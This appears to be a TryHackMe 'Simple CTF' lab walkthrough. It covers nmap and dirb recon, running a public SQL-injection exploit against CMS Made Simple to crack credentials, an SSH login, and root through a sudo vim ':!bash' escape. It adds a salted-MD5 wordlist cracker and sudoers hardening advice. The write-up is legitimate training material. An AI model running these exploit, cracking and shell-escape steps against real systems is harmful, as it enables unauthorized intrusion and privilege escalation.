Walkthrough for the TryHackMe Simple CTF

The Room is available at https://tryhackme.com/room/easyctf

Recon

Lets see what we are dealing with.

First, an nmap scan of all 65535 TCP ports to see what is listening on the machine

sudo nmap -sS -p- -T4 x.x.x.x -vv
  • -sS to run a SYN (half-open) scan, which needs raw sockets, hence the sudo
  • -p- to scan all 65535 ports
  • -T4 for an aggressive timing template (fast, but noisy)
  • -vv for very verbose output so we can monitor progress of the scan

And the results are as follows

  • PORT STATE SERVICE REASON
  • 21/tcp open ftp syn-ack ttl 63
  • 80/tcp open http syn-ack ttl 63
  • 2222/tcp open EtherNetIP-1 syn-ack ttl 63

Now let's find out a little more about these ports to see what they are actually running

sudo nmap -sS -sV -p21,80,2222 -T4 10.10.0.236 -vv
  • -sS to run a SYN (half-open) scan
  • -sV to run a version scan, which grabs banners and probes each service to identify the software and version
  • -p21,80,2222 to only scan ports 21, 80 and 2222
  • -T4 for an aggressive timing template (fast, but noisy)
  • -vv for very verbose output so we can monitor progress of the scan

And the results are as follows

  • PORT STATE SERVICE REASON VERSION
  • 21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
  • 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
  • 2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  • Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Basic Checks

Visiting http://x.x.x.x just gives us the standard Apache default page, nothing very useful

We can FTP anonymously into x.x.x.x, but a directory listing doesn't show any available files

Let's see if there are any hidden files or directories on this server

dirb http://x.x.x.x /usr/share/dirb/wordlists/common.txt 

And we do find something possibly useful with dirb

  • There's a robots.txt, so let's see if there are any interesting files or directories in it. It lists a directory named openemr-5_0_1_3, but requesting that directory gives a 404 error, so nothing useful there.
  • http://x.x.x.x/simple does give us something useful: it's a CMS

A little bit of reading on the page tells us that this is CMS Made Simple version 2.2.8. A search on ExploitDB turns up a time-based blind SQL injection exploit that covers this version (CMS Made Simple < 2.2.10, CVE-2019-9053), with a working script available at https://www.exploit-db.com/exploits/46635

Exploitation

Now it's time to hack in.

  • Download the exploit (a single Python 2 script) and save it somewhere.
  • Run it with python yourname.py. This gives a warning about Python 2 being end of life, plus an error about a missing module (termcolor).
  • So run pip install termcolor, using the pip that belongs to the Python 2 interpreter the script runs under.
  • Let's run the exploit again
python simple.py -u http://10.10.0.236/simple --crack -w /usr/share/wordlists/rockyou.txt
  • python tells the system to use python (Python 2 here; the script is not Python 3 compatible)
  • -u points the exploit at the CMS install on the server
  • --crack tells the exploit to try to crack the password hash it extracts, instead of only dumping the username, salt and hash
  • -w /usr/share/wordlists/rockyou.txt is the wordlist to use for that cracking

Go have a coffee and come back in 10 minutes and you will have a login and password.
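What the --crack step is actually doing is an offline wordlist attack on the salted MD5 hash the injection pulled out of the database. The example below is added here to show that step on its own; it is not code from the walkthrough or from exploit 46635. It assumes the CMS stores md5(salt + password), which is the check the exploit's crack routine performs, and the salt, hash and wordlist are constructed for the demo. On a real run you would feed in the salt and hash the exploit prints and point it at /usr/share/wordlists/rockyou.txt.

```python
"""Offline crack of a salted MD5 hash of the form md5(salt + password).

Added example, not part of the original walkthrough or of exploit 46635.
The salt, hash and wordlist below are constructed for the demo.
"""
import hashlib
from typing import Iterable, Optional


def cms_hash(salt: str, password: str) -> str:
    """Hex md5(salt + password): the scheme assumed for the dumped hash."""
    return hashlib.md5((salt + password).encode("latin-1")).hexdigest()


def crack_salted_md5(target_hash: str, salt: str,
                     candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose salted MD5 equals target_hash, else None.

    Candidates may come straight from a file handle; trailing newlines are
    stripped but nothing else is normalised, because passwords are case- and
    whitespace-sensitive.
    """
    target_hash = target_hash.strip().lower()
    for cand in candidates:
        cand = cand.rstrip("\r\n")
        if cms_hash(salt, cand) == target_hash:
            return cand
    return None


def crack_from_wordlist(target_hash: str, salt: str, path: str) -> Optional[str]:
    """Stream a wordlist file (rockyou.txt is not clean UTF-8, hence latin-1)."""
    with open(path, encoding="latin-1") as fh:
        return crack_salted_md5(target_hash, salt, fh)


# Constructed demo data: a hypothetical sitemask-style salt and a hash
# built from a password that appears in the constructed wordlist.
DEMO_SALT = "1dac0d92e9fa6bb2"
DEMO_PASSWORD = "secret"      # only used to build DEMO_HASH for the demo
DEMO_HASH = cms_hash(DEMO_SALT, DEMO_PASSWORD)
DEMO_WORDLIST = ["123456", "password", "letmein", "secret", "qwerty"]


if __name__ == "__main__":
    found = crack_salted_md5(DEMO_HASH, DEMO_SALT, DEMO_WORDLIST)
    print("salt     :", DEMO_SALT)
    print("hash     :", DEMO_HASH)
    print("cracked  :", found)          # prints "secret"
    # Wrong salt means no candidate can match, so the crack fails:
    print("bad salt :", crack_salted_md5(DEMO_HASH, "0000000000000000", DEMO_WORDLIST))
```

Note that the salt has to be the one the exploit dumped alongside the hash; with any other salt the loop runs the whole wordlist and returns None, which is also what you see when the password simply isn't in rockyou.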

Now it's time to log in to the system

ssh user@x.x.x.x -p 2222
  • ssh to get an interactive shell on the box
  • user is the username you got from the exploit results
  • -p 2222 is needed because ssh is running on the non-standard port
  • the password is the cracked one from the exploit results (the CMS password is reused for the SSH account)

Now do a quick search for user.txt, and you have the first flag. But wait, you are currently just a regular user, can you get root?

So let's see what this user is allowed to run as root via sudo

sudo -l

Which shows that one specific text editor can be run as root.

So let's run the text editor with sudo

sudo texteditor

Then break out of the text editor into a root shell using the editor's shell-escape command (the editor keeps the root privileges sudo gave it, and so does anything it spawns)

:!bash

And a quick change to the /root/ directory gives us the second flag in root.txt
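The root cause of this privilege escalation is the sudo rule itself: an interactive editor run as root will always hand out a root shell unless it is stopped from spawning processes. As an added example (not from the room or the walkthrough), here is a rule of that shape next to two safer alternatives. It assumes the editor is vim (which the :!bash escape implies) and a user named user; both are placeholders.

```sudoers
# Weak: any shell escape (:!bash, :shell, :terminal) gives a root shell,
# and vim can also read or write any file as root.
user ALL=(root) NOPASSWD: /usr/bin/vim

# Better: NOEXEC stops vim from running child processes, so the shell
# escapes fail. It works through LD_PRELOAD, so it only protects
# dynamically linked binaries, and vim can still open any file as root.
user ALL=(root) NOEXEC: /usr/bin/vim

# Best: if the user only needs to edit one file, grant sudoedit on that
# file. sudo copies it to a temp file, runs the editor as the user,
# and copies the result back as root, so the editor never has root.
user ALL=(root) sudoedit /etc/myapp/config.yml
```

Check the result from the user's own account with sudo -l before and after the change; the goal is that nothing listed there is a program that can launch a shell or arbitrary file writes as root.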